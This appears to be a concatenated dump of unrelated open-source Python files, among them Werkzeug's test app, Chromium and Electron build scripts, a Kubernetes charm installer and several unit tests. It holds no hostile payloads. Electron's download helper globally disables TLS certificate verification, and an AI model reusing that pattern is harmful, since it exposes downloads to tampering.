cWBA8mUzjJsN2KjSaSXGqMCVXYpYkj33mcIApyhQf6YqgeNAmNvuC0t4CsDbSshZJkCS1eNisKqlyG
cF8G2JeiDX6tO6Mv0SmjCa3MFb0bJaGPMU0X7c8XcpvMaOQmCajwSeY9G0WqbBmKv34DsMIEztU6Y2
KiDlFdt6jnCSqx7Dmt6XnqSKaFFHNO5+FmODxMCWBEaco77lNDGXBM0ECYB/+s7nKFdwSF5hgXumQe
EZ7amRg39RHy3zIjyRCykQh8Zo2iviRKyTDn/zx6EefptJj2Cw+Ep2FSc01U5ry4KLPYsTyWnVGnvb
UpyGlhjBUljyjHhWpf8OFaXwhp9O4T1gU9UeyPPa8A2l0p1kNqPXEVRm1AOs1oAGZU596t6SOR2mcB
Oco1srWtkaVrMUzIErrKri85keKqRQYX9VX0/eAUK1hrSu6HMEX3Qh2sCh0q0D2CtnUqS4hj62sE/z
aDs2Sg7MBS6xnQeooc2R2tC9YrKpEi9pLXfYXp20tDCpSP8rKlrD4axprb9u1Df5hSbz9QU0cRpfgn
kiIzwKucd0wsEHlLpe5yHXuc6FrNelOl7pY2+11kTWx7VpRu97dXA3DO1vbkhcb4zyvERYajQgAADs
='''), mimetype='image/png')
TEMPLATE = u'''\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<title>WSGI Information</title>
<style type="text/css">
@import url(http://fonts.googleapis.com/css?family=Ubuntu);
body { font-family: 'Lucida Grande', 'Lucida Sans Unicode', 'Geneva',
'Verdana', sans-serif; background-color: white; color: #000;
font-size: 15px; text-align: center; }
#logo { float: right; padding: 0 0 10px 10px; }
div.box { text-align: left; width: 45em; margin: auto; padding: 50px 0;
background-color: white; }
h1, h2 { font-family: 'Ubuntu', 'Lucida Grande', 'Lucida Sans Unicode',
'Geneva', 'Verdana', sans-serif; font-weight: normal; }
h1 { margin: 0 0 30px 0; }
h2 { font-size: 1.4em; margin: 1em 0 0.5em 0; }
table { width: 100%%; border-collapse: collapse; border: 1px solid #AFC5C9 }
table th { background-color: #AFC1C4; color: white; font-size: 0.72em;
font-weight: normal; width: 18em; vertical-align: top;
padding: 0.5em 0 0.1em 0.5em; }
table td { border: 1px solid #AFC5C9; padding: 0.1em 0 0.1em 0.5em; }
code { font-family: 'Consolas', 'Monaco', 'Bitstream Vera Sans Mono',
monospace; font-size: 0.7em; }
ul li { line-height: 1.5em; }
ul.path { font-size: 0.7em; margin: 0 -30px; padding: 8px 30px;
list-style: none; background: #E8EFF0; }
ul.path li { line-height: 1.6em; }
li.virtual { color: #999; text-decoration: underline; }
li.exp { background: white; }
</style>
<div class="box">
<img src="?resource=logo" id="logo" alt="[The Werkzeug Logo]" />
<h1>WSGI Information</h1>
<p>
This page displays all available information about the WSGI server and
the underlying Python interpreter.
<h2 id="python-interpreter">Python Interpreter</h2>
<table>
<tr>
<th>Python Version
<td>%(python_version)s
<tr>
<th>Platform
<td>%(platform)s [%(os)s]
<tr>
<th>API Version
<td>%(api_version)s
<tr>
<th>Byteorder
<td>%(byteorder)s
<tr>
<th>Werkzeug Version
<td>%(werkzeug_version)s
</table>
<h2 id="wsgi-environment">WSGI Environment</h2>
<table>%(wsgi_env)s</table>
<h2 id="installed-eggs">Installed Eggs</h2>
<p>
The following python packages were installed on the system as
Python eggs:
<ul>%(python_eggs)s</ul>
<h2 id="sys-path">System Path</h2>
<p>
The following paths are the current contents of the load path. The
following entries are looked up for Python packages. Note that not
all items in this path are folders. Gray and underlined items are
entries pointing to invalid resources or used by custom import hooks
such as the zip importer.
<p>
Items with a bright background were expanded for display from a relative
path. If you encounter such paths in the output you might want to check
your setup as relative paths are usually problematic in multithreaded
environments.
<ul class="path">%(sys_path)s</ul>
</div>
'''
def iter_sys_path():
if os.name == 'posix':
def strip(x):
prefix = os.path.expanduser('~')
if x.startswith(prefix):
x = '~' + x[len(prefix):]
return x
else:
strip = lambda x: x
cwd = os.path.abspath(os.getcwd())
for item in sys.path:
path = os.path.join(cwd, item or os.path.curdir)
yield strip(os.path.normpath(path)), \
not os.path.isdir(path), path != item
def render_testapp(req):
try:
import pkg_resources
except ImportError:
eggs = ()
else:
eggs = sorted(pkg_resources.working_set,
key=lambda x: x.project_name.lower())
python_eggs = []
for egg in eggs:
try:
version = egg.version
except (ValueError, AttributeError):
version = 'unknown'
python_eggs.append('<li>%s <small>[%s]</small>' % (
escape(egg.project_name),
escape(version)
))
wsgi_env = []
sorted_environ = sorted(req.environ.items(),
key=lambda x: repr(x[0]).lower())
for key, value in sorted_environ:
wsgi_env.append('<tr><th>%s<td><code>%s</code>' % (
escape(str(key)),
' '.join(wrap(escape(repr(value))))
))
sys_path = []
for item, virtual, expanded in iter_sys_path():
class_ = []
if virtual:
class_.append('virtual')
if expanded:
class_.append('exp')
sys_path.append('<li%s>%s' % (
class_ and ' class="%s"' % ' '.join(class_) or '',
escape(item)
))
return (TEMPLATE % {
'python_version': '<br>'.join(escape(sys.version).splitlines()),
'platform': escape(sys.platform),
'os': escape(os.name),
'api_version': sys.api_version,
'byteorder': sys.byteorder,
'werkzeug_version': werkzeug.__version__,
'python_eggs': '\n'.join(python_eggs),
'wsgi_env': '\n'.join(wsgi_env),
'sys_path': '\n'.join(sys_path)
}).encode('utf-8')
def test_app(environ, start_response):
"""Simple test application that dumps the environment. You can use
it to check if Werkzeug is working properly:
.. sourcecode:: pycon
>>> from werkzeug.serving import run_simple
>>> from werkzeug.testapp import test_app
>>> run_simple('localhost', 3000, test_app)
* Running on http://localhost:3000/
The application displays important information from the WSGI environment,
the Python interpreter and the installed libraries.
"""
req = Request(environ, populate_request=False)
if req.args.get('resource') == 'logo':
response = logo
else:
response = Response(render_testapp(req), mimetype='text/html')
return response(environ, start_response)
if __name__ == '__main__':
from werkzeug.serving import run_simple
run_simple('localhost', 5000, test_app, use_reloader=True)
|
linjoahow/w17g
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/xml/etree/cElementTree.py
|
876
|
# Deprecated alias for xml.etree.ElementTree
from xml.etree.ElementTree import *
|
Plain-Andy-legacy/android_external_chromium_org
|
refs/heads/lp-5.1r1
|
tools/generate_shim_headers/generate_shim_headers.py
|
150
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Generates shim headers that mirror the directory structure of bundled headers,
but just forward to the system ones.
This allows seamless compilation against system headers with no changes
to our source code.
"""
import optparse
import os.path
import sys
SHIM_TEMPLATE = """
#if defined(OFFICIAL_BUILD)
#error shim headers must not be used in official builds!
#endif
"""
def GeneratorMain(argv):
parser = optparse.OptionParser()
parser.add_option('--headers-root', action='append')
parser.add_option('--define', action='append')
parser.add_option('--output-directory')
parser.add_option('--prefix', default='')
parser.add_option('--use-include-next', action='store_true')
parser.add_option('--outputs', action='store_true')
parser.add_option('--generate', action='store_true')
options, args = parser.parse_args(argv)
if not options.headers_root:
parser.error('Missing --headers-root parameter.')
if not options.output_directory:
parser.error('Missing --output-directory parameter.')
if not args:
parser.error('Missing arguments - header file names.')
source_tree_root = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..'))
for root in options.headers_root:
target_directory = os.path.join(
options.output_directory,
os.path.relpath(root, source_tree_root))
if options.generate and not os.path.exists(target_directory):
os.makedirs(target_directory)
for header_spec in args:
if ';' in header_spec:
(header_filename,
include_before,
include_after) = header_spec.split(';', 2)
else:
header_filename = header_spec
include_before = ''
include_after = ''
if options.outputs:
yield os.path.join(target_directory, header_filename)
if options.generate:
with open(os.path.join(target_directory, header_filename), 'w') as f:
f.write(SHIM_TEMPLATE)
if options.define:
for define in options.define:
key, value = define.split('=', 1)
# This non-standard push_macro extension is supported
# by compilers we support (GCC, clang).
f.write('#pragma push_macro("%s")\n' % key)
f.write('#undef %s\n' % key)
f.write('#define %s %s\n' % (key, value))
if include_before:
for header in include_before.split(':'):
f.write('#include %s\n' % header)
include_target = options.prefix + header_filename
if options.use_include_next:
f.write('#include_next <%s>\n' % include_target)
else:
f.write('#include <%s>\n' % include_target)
if include_after:
for header in include_after.split(':'):
f.write('#include %s\n' % header)
if options.define:
for define in options.define:
key, value = define.split('=', 1)
# This non-standard pop_macro extension is supported
# by compilers we support (GCC, clang).
f.write('#pragma pop_macro("%s")\n' % key)
def DoMain(argv):
return '\n'.join(GeneratorMain(argv))
if __name__ == '__main__':
DoMain(sys.argv[1:])
|
wb14123/kubernetes
|
refs/heads/master
|
cluster/juju/charms/trusty/kubernetes-master/hooks/kubernetes_installer.py
|
213
|
#!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shlex
import subprocess
from path import path
def run(command, shell=False):
""" A convience method for executing all the commands. """
print(command)
if shell is False:
command = shlex.split(command)
output = subprocess.check_output(command, shell=shell)
print(output)
return output
class KubernetesInstaller():
"""
This class contains the logic needed to install kuberentes binary files.
"""
def __init__(self, arch, version, output_dir):
""" Gather the required variables for the install. """
# The kubernetes-master charm needs certain commands to be aliased.
self.aliases = {'kube-apiserver': 'apiserver',
'kube-controller-manager': 'controller-manager',
'kube-proxy': 'kube-proxy',
'kube-scheduler': 'scheduler',
'kubectl': 'kubectl',
'kubelet': 'kubelet'}
self.arch = arch
self.version = version
self.output_dir = path(output_dir)
def build(self, branch):
""" Build kubernetes from a github repository using the Makefile. """
# Remove any old build artifacts.
make_clean = 'make clean'
run(make_clean)
# Always checkout the master to get the latest repository information.
git_checkout_cmd = 'git checkout master'
run(git_checkout_cmd)
# When checking out a tag, delete the old branch (not master).
if branch != 'master':
git_drop_branch = 'git branch -D {0}'.format(self.version)
print(git_drop_branch)
rc = subprocess.call(git_drop_branch.split())
if rc != 0:
print('returned: %d' % rc)
# Make sure the git repository is up-to-date.
git_fetch = 'git fetch origin {0}'.format(branch)
run(git_fetch)
if branch == 'master':
git_reset = 'git reset --hard origin/master'
run(git_reset)
else:
# Checkout a branch of kubernetes so the repo is correct.
checkout = 'git checkout -b {0} {1}'.format(self.version, branch)
run(checkout)
# Create an environment with the path to the GO binaries included.
go_path = ('/usr/local/go/bin', os.environ.get('PATH', ''))
go_env = os.environ.copy()
go_env['PATH'] = ':'.join(go_path)
print(go_env['PATH'])
# Compile the binaries with the make command using the WHAT variable.
make_what = "make all WHAT='cmd/kube-apiserver cmd/kubectl "\
"cmd/kube-controller-manager plugin/cmd/kube-scheduler "\
"cmd/kubelet cmd/kube-proxy'"
print(make_what)
rc = subprocess.call(shlex.split(make_what), env=go_env)
def install(self, install_dir=path('/usr/local/bin')):
""" Install kubernetes binary files from the output directory. """
if not install_dir.isdir():
install_dir.makedirs_p()
# Create the symbolic links to the real kubernetes binaries.
for key, value in self.aliases.iteritems():
target = self.output_dir / key
if target.exists():
link = install_dir / value
if link.exists():
link.remove()
target.symlink(link)
else:
print('Error target file {0} does not exist.'.format(target))
exit(1)
|
KodingKlub/gHashCode
|
refs/heads/master
|
wojtek.py
|
1
|
import numpy as np
import philipp as p
import kordian as k
import anna as a
import parser
import sys
import itertools
def print_combination(combination):
used_caches = sorted([k for k,v in combination.items() if v[0]!=0])
print(len(used_caches))
for used_cache in used_caches:
videos_str = " ".join([str(c) for c in combination[used_cache][1]])
print(used_cache, videos_str)
def make_sets(items, cache_ids, num_of_boxes=3):
allpossible = []
for tup in itertools.product(range(len(cache_ids)), repeat=len(items)):
boxes = [list() for _ in range(len(cache_ids))]
for item, box in zip(items, tup):
# print (cache_ids[box])
# itee = (, item)
boxes[box].append({cache_ids[box]: (0, item)})
# print(boxes)
boxes_ = []
boxes__ = []
for b in boxes:
ob = {}
for e in b:
for k in e:
if k not in ob:
ob[k] = (0,[])
ob[k][1].append(e[k][1])
boxes_.append(ob)
for k,v in ob.items():
boxes__.append((k,ob[k][1]))
# print(boxes__)
# print(boxes_)
allpossible.append(boxes__)
return allpossible
if __name__ == '__main__':
fname = sys.argv[1] if len(sys.argv) == 2 else "data/small.in"
problem = parser.get_problem(fname)
# combination = {0:(80,[0,2]),1:(30,[1]),2:(0,[]),5:(10,[100])}
# for k,v in combination.items():
# print(k,v)
# print()
# print()
# print_combination(combination)
make_sets(('A', 'B', 'C'), [0,1,8])
# for p in make_sets(('A', 'B', 'C'), [0,1,8]):
# for box in p:
# print(str(box).ljust(20),)
# print()
|
qPCR4vir/orange3
|
refs/heads/master
|
Orange/tests/test_clustering_hierarchical.py
|
1
|
# Test methods with long descriptive names can omit docstrings
# pylint: disable=missing-docstring
import unittest
from itertools import chain, tee
import numpy
from Orange.clustering import hierarchical
import Orange.misc
def flatten(seq):
return chain(*seq)
class TestHierarchical(unittest.TestCase):
@classmethod
def setUpClass(cls):
m = [[],
[3],
[2, 4],
[17, 5, 4],
[2, 8, 3, 8],
[7, 5, 10, 11, 2],
[8, 4, 1, 5, 11, 13],
[4, 7, 12, 8, 10, 1, 5],
[13, 9, 14, 15, 7, 8, 4, 6],
[12, 10, 11, 15, 2, 5, 7, 3, 1]]
cls.items = ["Ann", "Bob", "Curt", "Danny", "Eve", "Fred",
"Greg", "Hue", "Ivy", "Jon"]
dist = numpy.array(list(flatten(m)), dtype=float)
matrix = hierarchical.squareform(dist, mode="lower")
cls.m = m
cls.matrix = Orange.misc.DistMatrix(matrix)
cls.matrix.items = cls.items
cls.cluster = hierarchical.dist_matrix_clustering(cls.matrix)
def test_mapping(self):
leaves = list(hierarchical.leaves(self.cluster))
indices = [n.value.index for n in leaves]
self.assertEqual(len(indices), len(self.matrix.items))
self.assertEqual(set(indices), set(range(len(self.matrix.items))))
#self.assertEqual(indices,
# [3, 1, 2, 6, 0, 4, 8, 9, 5, 7])
def test_order(self):
post = list(hierarchical.postorder(self.cluster))
seen = set()
for n in post:
self.assertTrue(all(ch in seen for ch in n.branches))
seen.add(n)
pre = list(hierarchical.preorder(self.cluster))
seen = set()
for n in pre:
self.assertTrue(all(ch not in seen for ch in n.branches))
seen.add(n)
def test_prunning(self):
pruned = hierarchical.prune(self.cluster, level=2)
depths = hierarchical.cluster_depths(pruned)
self.assertTrue(all(d <= 2 for d in depths.values()))
pruned = hierarchical.prune(self.cluster, height=10)
self.assertTrue(c.height >= 10 for c in hierarchical.preorder(pruned))
def test_form(self):
m = [[0, 2, 3, 4],
[2, 0, 6, 7],
[3, 6, 0, 8],
[4, 7, 8, 0]]
m = numpy.array(m)
dist = hierarchical.condensedform(m, mode="lower")
numpy.testing.assert_equal(dist, numpy.array([2, 3, 6, 4, 7, 8]))
numpy.testing.assert_equal(
hierarchical.squareform(dist, mode="lower"), m)
dist = hierarchical.condensedform(m, mode="upper")
numpy.testing.assert_equal(dist, numpy.array([2, 3, 4, 6, 7, 8]))
numpy.testing.assert_equal(
hierarchical.squareform(dist, mode="upper"), m)
def test_pre_post_order(self):
tree = hierarchical.Tree
root = tree("A", (tree("B"), tree("C")))
self.assertEqual([n.value for n in hierarchical.postorder(root)],
["B", "C", "A"])
self.assertEqual([n.value for n in hierarchical.preorder(root)],
["A", "B", "C"])
def test_optimal_ordering(self):
def indices(root):
return [leaf.value.index for leaf in hierarchical.leaves(root)]
ordered = hierarchical.optimal_leaf_ordering(
self.cluster, self.matrix)
self.assertEqual(ordered.value.range, self.cluster.value.range)
self.assertSetEqual(set(indices(self.cluster)),
set(indices(ordered)))
def pairs(iterable):
i1, i2 = tee(iterable)
next(i1)
yield from zip(i1, i2)
def score(root):
return sum([self.matrix[i, j] for i, j in pairs(indices(root))])
score_unordered = score(self.cluster)
score_ordered = score(ordered)
self.assertGreater(score_unordered, score_ordered)
self.assertEqual(score_ordered, 21.0)
class TestTree(unittest.TestCase):
def test_tree(self):
Tree = hierarchical.Tree
left = Tree(0, ())
self.assertTrue(left.is_leaf)
right = Tree(1, ())
self.assertEqual(left, Tree(0, ()))
self.assertNotEqual(left, right)
self.assertLess(left, right)
root = Tree(2, (left, right))
self.assertFalse(root.is_leaf)
self.assertIs(root.left, left)
self.assertIs(root.right, right)
val, br = root
self.assertEqual(val, 2)
self.assertEqual(br, (left, right))
self.assertEqual(repr(left), "Tree(value=0, branches=())")
|
credp/lisa
|
refs/heads/master
|
external/workload-automation/wa/workloads/templerun2/__init__.py
|
5
|
# Copyright 2013-2018 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from wa import ApkReventWorkload
class TempleRun2(ApkReventWorkload):
name = 'templerun2'
package_names = ['com.imangi.templerun2']
description = """
Temple Run 2 game.
Sequel to Temple Run. 3D on-the-rails racer.
"""
view = 'SurfaceView - com.imangi.templerun2/com.imangi.unityactivity.ImangiUnityNativeActivity'
|
GoogleCloudPlatform/training-data-analyst
|
refs/heads/master
|
courses/machine_learning/deepdive2/production_ml/labs/samples/contrib/azure-samples/kfp-azure-databricks/tests/test_workspaceitem_op.py
|
3
|
import unittest
from pathlib import Path
import kfp
from kfp.dsl import PipelineParam
from databricks import ImportWorkspaceItemOp, DeleteWorkspaceItemOp
class TestImportWorkspaceItemOp(unittest.TestCase):
def test_databricks_import_workspaceitem_without_k8s_or_item_name(self):
def my_pipeline():
ImportWorkspaceItemOp(
name="importworkspaceitem",
content="cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
path="/Users/user@foo.com/ScalaExampleNotebook",
language="SCALA",
file_format="SOURCE"
)
self.assertRaises(ValueError, lambda: kfp.compiler.Compiler()._create_workflow(my_pipeline))
def test_databricks_import_workspaceitem(self):
def my_pipeline():
item_name = "test-item"
content = "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK"
path = "/Users/user@foo.com/ScalaExampleNotebook"
language = "SCALA"
file_format = "SOURCE"
expected_spec = {
"content": content,
"path": path,
"language": language,
"format": file_format
}
res = ImportWorkspaceItemOp(
name="importworkspaceitem",
item_name=item_name,
content=content,
path=path,
language=language,
file_format=file_format
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_spec(self):
def my_pipeline():
item_name = "test-item"
spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp(
name="importworkspaceitem",
item_name=item_name,
spec=spec
)
self.assert_res(res, spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_spec_and_extra_args(self):
def my_pipeline():
item_name = "test-item"
content = "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK"
spec = {
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
expected_spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp(
name="importworkspaceitem",
item_name=item_name,
spec=spec,
content=content
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_json_spec(self):
def my_pipeline():
item_name = "test-item"
json_spec = """
{
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
"""
expected_spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp.from_json_spec(
name="importworkspaceitem",
item_name=item_name,
json_spec=json_spec
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_json_file_spec(self):
def my_pipeline():
item_name = "test-item"
current_path = Path(__file__).parent
json_spec_file_name = current_path.joinpath("workspaceitem_spec.json")
expected_spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp.from_file_name(
name="importworkspaceitem",
item_name=item_name,
file_name=json_spec_file_name
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def assert_res(self, res, expected_spec):
self.assertEqual(res.name, "importworkspaceitem")
self.assertEqual(res.resource.action, "create")
self.assertEqual(res.resource.success_condition, "status.object_hash")
self.assertEqual(res.resource.failure_condition, None)
self.assertEqual(res.resource.manifest, None)
expected_attribute_outputs = {
"name": "{.metadata.name}",
"object_hash": "{.status.object_hash}",
"object_language": "{.status.object_info.language}",
"object_type": "{.status.object_info.object_type}",
"object_path": "{.status.object_info.path}",
"manifest": "{}"
}
self.assertEqual(res.attribute_outputs, expected_attribute_outputs)
expected_outputs = {
"name": PipelineParam(name="name", op_name=res.name),
"object_hash": PipelineParam(name="object_hash", op_name=res.name),
"object_language": PipelineParam(name="object_language", op_name=res.name),
"object_type": PipelineParam(name="object_type", op_name=res.name),
"object_path": PipelineParam(name="object_path", op_name=res.name),
"manifest": PipelineParam(name="manifest", op_name=res.name)
}
self.assertEqual(res.outputs, expected_outputs)
self.assertEqual(
res.output,
PipelineParam(name="name", op_name=res.name)
)
self.assertEqual(res.dependent_names, [])
self.assertEqual(res.k8s_resource["kind"], "WorkspaceItem")
self.assertEqual(res.k8s_resource["metadata"]["name"], "test-item")
self.assertEqual(res.k8s_resource["spec"], expected_spec)
class TestDeleteWorkspaceItemOp(unittest.TestCase):
def test_databricks_delete_workspaceitem_without_k8s_or_item_name(self):
def my_pipeline():
DeleteWorkspaceItemOp(
name="deleteworkspaceitem"
)
self.assertRaises(ValueError, lambda: kfp.compiler.Compiler()._create_workflow(my_pipeline))
def test_databricks_delete_workspaceitem(self):
def my_pipeline():
res = DeleteWorkspaceItemOp(
name="deleteworkspaceitem",
item_name="test-item"
)
self.assertEqual(res.name, "deleteworkspaceitem")
self.assertEqual(res.resource.action, "delete")
self.assertEqual(res.resource.success_condition, None)
self.assertEqual(res.resource.failure_condition, None)
self.assertEqual(res.resource.manifest, None)
self.assertEqual(res.attribute_outputs, {})
self.assertEqual(res.outputs, {})
self.assertEqual(res.output, None)
self.assertEqual(res.dependent_names, [])
self.assertEqual(res.k8s_resource["kind"], "WorkspaceItem")
self.assertEqual(res.k8s_resource["metadata"]["name"], "test-item")
kfp.compiler.Compiler()._create_workflow(my_pipeline)
if __name__ == '__main__':
unittest.main()
|
xfstudio/electron
|
refs/heads/master
|
script/lib/util.py
|
149
|
#!/usr/bin/env python
import atexit
import contextlib
import errno
import platform
import re
import shutil
import ssl
import subprocess
import sys
import tarfile
import tempfile
import urllib2
import os
import zipfile
from config import is_verbose_mode
def get_host_arch():
"""Returns the host architecture with a predictable string."""
host_arch = platform.machine()
# Convert machine type to format recognized by gyp.
if re.match(r'i.86', host_arch) or host_arch == 'i86pc':
host_arch = 'ia32'
elif host_arch in ['x86_64', 'amd64']:
host_arch = 'x64'
elif host_arch.startswith('arm'):
host_arch = 'arm'
# platform.machine is based on running kernel. It's possible to use 64-bit
# kernel with 32-bit userland, e.g. to give linker slightly more memory.
# Distinguish between different userland bitness by querying
# the python binary.
if host_arch == 'x64' and platform.architecture()[0] == '32bit':
host_arch = 'ia32'
return host_arch
def tempdir(prefix=''):
directory = tempfile.mkdtemp(prefix=prefix)
atexit.register(shutil.rmtree, directory)
return directory
@contextlib.contextmanager
def scoped_cwd(path):
cwd = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def scoped_env(key, value):
origin = ''
if key in os.environ:
origin = os.environ[key]
os.environ[key] = value
try:
yield
finally:
os.environ[key] = origin
def download(text, url, path):
safe_mkdir(os.path.dirname(path))
with open(path, 'wb') as local_file:
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
web_file = urllib2.urlopen(url)
file_size = int(web_file.info().getheaders("Content-Length")[0])
downloaded_size = 0
block_size = 128
ci = os.environ.get('CI') == '1'
while True:
buf = web_file.read(block_size)
if not buf:
break
downloaded_size += len(buf)
local_file.write(buf)
if not ci:
percent = downloaded_size * 100. / file_size
status = "\r%s %10d [%3.1f%%]" % (text, downloaded_size, percent)
print status,
if ci:
print "%s done." % (text)
else:
print
return path
def extract_tarball(tarball_path, member, destination):
with tarfile.open(tarball_path) as tarball:
tarball.extract(member, destination)
def extract_zip(zip_path, destination):
if sys.platform == 'darwin':
# Use unzip command on Mac to keep symbol links in zip file work.
execute(['unzip', zip_path, '-d', destination])
else:
with zipfile.ZipFile(zip_path) as z:
z.extractall(destination)
def make_zip(zip_file_path, files, dirs):
safe_unlink(zip_file_path)
if sys.platform == 'darwin':
files += dirs
execute(['zip', '-r', '-y', zip_file_path] + files)
else:
zip_file = zipfile.ZipFile(zip_file_path, "w", zipfile.ZIP_DEFLATED)
for filename in files:
zip_file.write(filename, filename)
for dirname in dirs:
for root, _, filenames in os.walk(dirname):
for f in filenames:
zip_file.write(os.path.join(root, f))
zip_file.close()
def rm_rf(path):
try:
shutil.rmtree(path)
except OSError:
pass
def safe_unlink(path):
try:
os.unlink(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def safe_mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def execute(argv, env=os.environ):
if is_verbose_mode():
print ' '.join(argv)
try:
output = subprocess.check_output(argv, stderr=subprocess.STDOUT, env=env)
if is_verbose_mode():
print output
return output
except subprocess.CalledProcessError as e:
print e.output
raise e
def execute_stdout(argv, env=os.environ):
if is_verbose_mode():
print ' '.join(argv)
try:
subprocess.check_call(argv, env=env)
except subprocess.CalledProcessError as e:
print e.output
raise e
else:
execute(argv, env)
def atom_gyp():
SOURCE_ROOT = os.path.abspath(os.path.join(__file__, '..', '..', '..'))
gyp = os.path.join(SOURCE_ROOT, 'atom.gyp')
with open(gyp) as f:
obj = eval(f.read());
return obj['variables']
def get_atom_shell_version():
return 'v' + atom_gyp()['version%']
def parse_version(version):
if version[0] == 'v':
version = version[1:]
vs = version.split('.')
if len(vs) > 4:
return vs[0:4]
else:
return vs + ['0'] * (4 - len(vs))
def s3put(bucket, access_key, secret_key, prefix, key_prefix, files):
env = os.environ.copy()
BOTO_DIR = os.path.abspath(os.path.join(__file__, '..', '..', '..', 'vendor',
'boto'))
env['PYTHONPATH'] = os.path.pathsep.join([
env.get('PYTHONPATH', ''),
os.path.join(BOTO_DIR, 'build', 'lib'),
os.path.join(BOTO_DIR, 'build', 'lib.linux-x86_64-2.7')])
boto = os.path.join(BOTO_DIR, 'bin', 's3put')
args = [
sys.executable,
boto,
'--bucket', bucket,
'--access_key', access_key,
'--secret_key', secret_key,
'--prefix', prefix,
'--key_prefix', key_prefix,
'--grant', 'public-read'
] + files
execute(args, env)
|
cfournie/segmentation.evaluation
|
refs/heads/master
|
segeval/util/lang.py
|
2
|
'''
Python-language utils.
.. moduleauthor:: Chris Fournier <chris.m.fournier@gmail.com>
'''
def enum(*sequential, **named):
'''
http://stackoverflow.com/a/1695250/2134
'''
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
|
drrk/micropython
|
refs/heads/master
|
tests/misc/recursive_iternext.py
|
3
|
# This tests that recursion with iternext doesn't lead to segfault.
try:
[0] * 10000
N = 1000
except:
N = 100
try:
x = (1, 2)
for i in range(N):
x = enumerate(x)
tuple(x)
except RuntimeError:
print("RuntimeError")
try:
x = (1, 2)
for i in range(N):
x = filter(None, x)
tuple(x)
except RuntimeError:
print("RuntimeError")
try:
x = (1, 2)
for i in range(N):
x = map(max, x, ())
tuple(x)
except RuntimeError:
print("RuntimeError")
try:
x = (1, 2)
for i in range(N):
x = zip(x)
tuple(x)
except RuntimeError:
print("RuntimeError")
|
n0n0x/fabtools-python
|
refs/heads/master
|
fabtools/python_setuptools.py
|
2
|
"""
Python packages
===============
This module provides tools for installing Python packages using
the ``easy_install`` command provided by `setuptools`_.
.. _setuptools: http://pythonhosted.org/setuptools/
"""
from fabric.api import cd, run
from fabtools.utils import download, run_as_root
# Python2 and 3 compatibility
from past.builtins import basestring
EZ_SETUP_URL = 'https://bootstrap.pypa.io/ez_setup.py'
def package_version(name, python_cmd='python'):
"""
Get the installed version of a package
Returns ``None`` if it can't be found.
"""
cmd = '''%(python_cmd)s -c \
"import pkg_resources;\
dist = pkg_resources.get_distribution('%(name)s');\
print(dist.version)"
''' % locals()
res = run(cmd, quiet=True)
if res.succeeded:
return res
else:
return None
def is_setuptools_installed(python_cmd='python'):
"""
Check if `setuptools`_ is installed.
.. _setuptools: http://pythonhosted.org/setuptools/
"""
version = package_version('setuptools', python_cmd=python_cmd)
return (version is not None)
def install_setuptools(python_cmd='python', use_sudo=True):
"""
Install the latest version of `setuptools`_.
::
import fabtools
fabtools.python_setuptools.install_setuptools()
"""
setuptools_version = package_version('setuptools', python_cmd)
distribute_version = package_version('distribute', python_cmd)
